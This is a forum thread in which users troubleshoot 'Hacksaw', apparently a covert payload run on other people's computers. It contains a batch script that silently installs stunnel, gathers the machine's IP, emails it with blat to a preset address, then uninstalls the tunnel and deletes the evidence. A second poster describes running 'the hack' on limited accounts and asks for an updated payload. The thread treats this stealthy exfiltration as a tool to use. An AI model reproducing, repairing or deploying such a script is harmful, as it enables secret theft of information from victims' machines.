Jump to content

Hacksaw Stunnel Error


Masterpyro

Recommended Posts

ERROR:

2006.11.17 12:56:32 LOG5[320:2596]: stunnel 4.11 on x86-pc-mingw32-gnu WIN32+IPv6 with OpenSSL 0.9.7f 22 Mar 2005

2006.11.17 12:56:32 LOG5[320:3480]: No limit detected for the number of clients

2006.11.17 12:56:32 LOG3[320:3480]: listen: Invalid argument (WSAEINVAL) (10022)



2006.11.17 12:56:32 LOG3[320:3480]: Server is down

Send.cmd

@echo off

:start

:: Configure Email Options

SET emailfrom= xxxxxxxxxxxxxxxxxxxxx@xxxxxxxx 

SET emailto= xxxxxxxxxxxxxxxxxxxxxxx@xxxxxxxx 

SET password= xxxxxxxxxxxxx

SET subject= %computername%_ip



call getip.cmd



stunnel-4.11.exe -install -quiet

net start stunnel

GOTO sendfiles





:sendfiles





for %%i in (ip.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup





:cleanup

:: Stop stunnel

rem taskkill /f /im stunnel-4.11.exe (??)

net stop stunnel

stunnel-4.11.exe -uninstall -quiet

:: Delete documents

del ip.txt

ping -n 3 localhost > NUL

GOTO end

:end

anyone know whats up with this?

and should it be send.bat or send.cmd?

Link to comment
Share on other sites

I am having similar stunnel problems as well when I run the hack on a limited account. "Failed to create a new service and Failed to open the service."

I wondered if I upgraded stunnel to the newest version if that would solve the problem, but I am not too sure if this would work. (not sure how to do that either)

Let me know what you guys suggest. :?

Could somebody also post a new payload with the upgraded version of stunnel as well as all of the other software involved with it.

I would appreciate it. :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...